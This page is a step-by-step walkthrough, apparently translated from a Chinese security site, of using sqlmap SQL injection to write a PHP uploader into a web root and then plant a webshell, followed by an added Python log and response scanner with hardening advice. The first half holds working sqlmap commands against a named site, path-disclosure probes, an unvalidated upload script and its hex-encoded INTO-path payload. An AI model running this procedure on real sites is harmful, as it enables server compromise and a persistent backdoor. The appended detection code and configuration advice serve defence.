昔日

Writing a shell interactively with sqlmap

Global internet security media knowledge Q&A platform:

1. First, an injection point:

./sqlmap.py -u https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --dbs



2. Check the current user, i.e. whether it is the root account (whether we have the privileges):

./sqlmap.py -u https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep --current-user



3. Find a way to get the site's absolute path (needed to write the shell to a specified location):

https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep shows SQL injection

https://www.sitio-web.com/parametro-vulnerable?txt_palabra=[]isep we see a full path disclosure

https://www.sitio-web.com/parametro-vulnerable?txt_palabra=huey we see a full path disclosure

https://www.sitio-web.com/parametro-vulnerable?txt_palabra=isep! shows a full path information disclosure

https://www.sitio-web.com/parametro-vulnerable?txt_palabra='isep“ we will see a full path information disclosure



4. Here we write a piece of code ourselves to build an upload page; the code is as follows:

<form enctype="multipart/form-data" action="upload.php" method="POST">
  <input name="uploadedfile" type="file"/>
  <input type="submit" value="Upload File"/>
</form>
<?php
// Takes the uploaded file's original name and moves it into the script's own
// directory; there is no type, size or name validation (the uploader as written).
$target_path = basename($_FILES['uploadedfile']['name']);
if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo basename($_FILES['uploadedfile']['name']) . " has been uploaded";
} else {
    echo "Error!";
}
?>



5. We write the shell by executing a SQL statement through sqlmap's --sql-shell; the constructed code has to be hex-encoded (hexadecimal) first.



6. Good, on to the main topic. Build the SQL statement that performs the shell write: SELECT + 0x + hex code + INTO + full path + upload file name



select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e


into "/espejo/htdocs.v2/portalnuevo/buscadores/upload.php"; 



7. OK! The upload succeeded; now visit upload.php and upload our webshell.
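From the defender's side, the walkthrough above leaves two concrete things to watch for: requests that carry a long 0x hex literal together with an INTO "<path>" clause (step 6), and PHP warning output that hands out a script's absolute path (step 3). The Python below is an added example written for this page, not code from the original post or from sqlmap; the access-log lines, the response body and the regex signatures in it are constructed assumptions, not rules taken from any product.

```python
"""Defensive check for the technique walked through above, written as an added
example for this page (not the post's own code). It scans web-server access
log lines for SQL file-write attempts and long hex literals, decodes the hex to
see whether it carries PHP, and scans a response body for the PHP warning
format that leaks a script's full path. Sample log lines, the response body and
the signatures are constructed for illustration."""
import re
from urllib.parse import unquote_plus

# INTO followed by a quoted absolute path, with or without OUTFILE/DUMPFILE.
FILE_WRITE_RE = re.compile(r"\binto\s+(?:outfile\s+|dumpfile\s+)?[\"']/", re.IGNORECASE)
# A 0x hex literal of 40+ digits: long enough to hold a file's worth of content.
HEX_LITERAL_RE = re.compile(r"0x([0-9a-f]{40,})", re.IGNORECASE)
# PHP's default error text, plain or with html_errors markup, names the script path.
PHP_PATH_LEAK_RE = re.compile(
    r"(?:Warning|Notice|Fatal error)(?:</b>)?:.*?\bin (?:<b>)?(/[^\s<]+\.php)(?:</b>)? on line",
    re.DOTALL,
)

# Constructed sample data: a benign request and one carrying a hex-encoded
# payload plus an INTO "<path>" clause, and a constructed PHP warning page.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search.php?q=isep HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search.php?q=isep%27%20select%20'
    '0x3c3f706870206563686f2027636f6e7374727563746564273b203f3e%20into%20'
    '%22/var/www/html/upload.php%22 HTTP/1.1" 500 231',
]
SAMPLE_RESPONSE = (
    "<br />\n<b>Warning</b>:  mysql_fetch_array() expects parameter 1 to be resource, "
    "boolean given in <b>/var/www/html/search.php</b> on line <b>42</b><br />\n"
)


def decode_hex_literal(hex_digits):
    """Decode the digits after 0x so the analyst can read what would be written."""
    try:
        return bytes.fromhex(hex_digits).decode("utf-8", errors="replace")
    except ValueError:  # odd length or non-hex characters
        return ""


def inspect_request(log_line):
    """Return the indicator names found in one combined-format access-log line."""
    findings = []
    match = re.search(r'"(?:GET|POST) (\S+)', log_line)
    if not match:
        return findings
    query = unquote_plus(match.group(1))  # payloads arrive URL-encoded
    if FILE_WRITE_RE.search(query):
        findings.append("sql_file_write")
    for hex_digits in HEX_LITERAL_RE.findall(query):
        findings.append("long_hex_literal")
        if "<?php" in decode_hex_literal(hex_digits).lower():
            findings.append("hex_encoded_php")
    return findings


def scan_log(lines):
    """Map each suspicious line's index to its findings; clean lines are omitted."""
    return {i: f for i, line in enumerate(lines) if (f := inspect_request(line))}


def leaked_paths(response_body):
    """Absolute .php paths exposed by PHP error output in a response body."""
    return sorted({m.group(1) for m in PHP_PATH_LEAK_RE.finditer(response_body)})


if __name__ == "__main__":
    for index, findings in scan_log(SAMPLE_LOG).items():
        print(f"line {index}: {', '.join(findings)}")
    print("paths leaked by sample response:", leaked_paths(SAMPLE_RESPONSE))
```

Decoding the hex literal is the point of the request check: the 0x form exists precisely so the PHP tags never appear in the query string, so a signature that only looks for "<?php" misses it. The response check is the counterpart of step 3; the same warning text that helps the attacker is visible to the site owner in a crawl of their own pages. The settings that remove the preconditions are the usual ones: do not grant the application's database account the FILE privilege, set MySQL's secure_file_priv to NULL (or to a directory outside the web root) so SELECT ... INTO OUTFILE cannot drop files where the web server executes them, and set display_errors=Off in php.ini so the absolute path is logged rather than sent to the client.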
